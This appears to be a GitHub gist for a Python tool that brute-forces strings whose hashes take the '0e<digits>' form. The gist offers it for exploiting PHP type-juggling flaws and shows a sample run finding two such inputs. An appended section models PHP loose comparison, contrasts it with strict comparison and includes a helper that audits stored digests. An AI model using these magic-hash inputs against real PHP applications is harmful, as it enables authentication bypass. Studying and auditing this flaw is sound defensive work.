@dhondta
Last active July 31, 2023 22:14
Tinyscript tool for generating loose comparison hashes for PHP type juggling

PHP loose comparison input generator

This Tinyscript-based tool generates a string over a given alphabet whose hash matches the format used for PHP type juggling, that is, when a loose comparison of the form ("0e12345" == ...) is used.

This can be installed using:

$ pip install tinyscript
$ tsm install loose-comparison-input-generator

This tool is especially useful in the use cases hereafter.

Generate hashes for exploiting a PHP type juggling vulnerability

$ python3 loose-comparison-input-generator.py --timings -a 0123456789abcdefABCDEF
22:08:25 [WARNING] 0e283693623042943587666692738042: 1Cbca4D
22:08:25 [TIME] > Time elapsed since execution start: 976.6611046791077 seconds
22:22:14 [WARNING] 0e743365132016763607448823802679: 462beA7
22:22:14 [TIME] > Time elapsed since execution start: 1805.5506649017334 seconds
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from tinyscript import *


__author__    = "Alexandre D'Hondt"
__version__   = "1.1"
__copyright__ = "A. D'Hondt"
__license__   = "agpl-3.0"
__doc__       = """
This tool simply generates a string with a given alphabet that has a given hash
 matching the format used for type juggling with PHP, that is when a loose
 comparison of the type ("0e12345" == ...) is used.
"""
__examples__  = ["-v", "-a 0123456789abcdefABCDEF", "--hash sha1", "--timings"]


if __name__ == '__main__':
    parser.add_argument("-a", dest="alphabet", default=string.digits+string.ascii_letters, help="alphabet to be used")
    parser.add_argument("--hash", default="md5", help="hash algorithm to be used")
    initialize(add_time=True)
    # reject hash names that hashlib does not provide
    validate(('hash', "not hasattr(hashlib, ? )", "Bad hash algorithm"))
    # enumerate candidate strings over the chosen alphabet
    for s in ts.bruteforce(2**32, args.alphabet):
        h = getattr(hashlib, args.hash)(b(s)).hexdigest()
        logger.debug("{}: {}".format(h, s))
        # report digests of the form 0e<digits>, which PHP reads as the number 0
        if re.match(r"^0+e\d+$", h):
            logger.warning("{}: {}".format(h, s))
            get_time()
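
Why the two digests in the sample run above matter to a defender, as an added example that is not part of the gist: a simplified Python model of PHP's `==` on two strings, set beside a strict comparison and an audit helper that reuses the tool's regex. The names `php_loose_eq`, `strict_eq` and `audit` are hypothetical, and the numeric-string model is an assumption that ignores PHP's whitespace and integer-overflow handling.

```python
import hashlib
import hmac
import re

# Same pattern the tool on this page uses to recognise a "0e..." digest.
MAGIC = re.compile(r"^0+e\d+$")
# Simplified model of a PHP numeric string (assumption: no whitespace rules).
NUMERIC = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")

# The two digests shown in the sample run on this page.
DIGEST_A = "0e283693623042943587666692738042"
DIGEST_B = "0e743365132016763607448823802679"
# Constructed sample: an ordinary digest that is not a numeric string.
DIGEST_C = hashlib.md5(b"example").hexdigest()


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP `$a == $b` on two strings: numeric strings compare as numbers."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        # "0e<digits>" is scientific notation for zero, so both sides become 0.0
        return float(a) == float(b)
    return a == b


def strict_eq(a: str, b: str) -> bool:
    """Byte-wise, constant-time comparison (what `===` or hash_equals() gives in PHP)."""
    return hmac.compare_digest(a.encode(), b.encode())


def audit(digests):
    """Return the stored digests that a loose comparison would treat as zero."""
    return [d for d in digests if MAGIC.match(d)]


if __name__ == "__main__":
    print("loose  A == B:", php_loose_eq(DIGEST_A, DIGEST_B))   # different digests, equal as numbers
    print("strict A == B:", strict_eq(DIGEST_A, DIGEST_B))
    print("digests to review:", audit([DIGEST_A, DIGEST_B, DIGEST_C]))
```

Any code path that compares digests with `==` should be switched to a strict comparison; the `audit` helper only flags stored values that are exposed while the loose comparison is still in place.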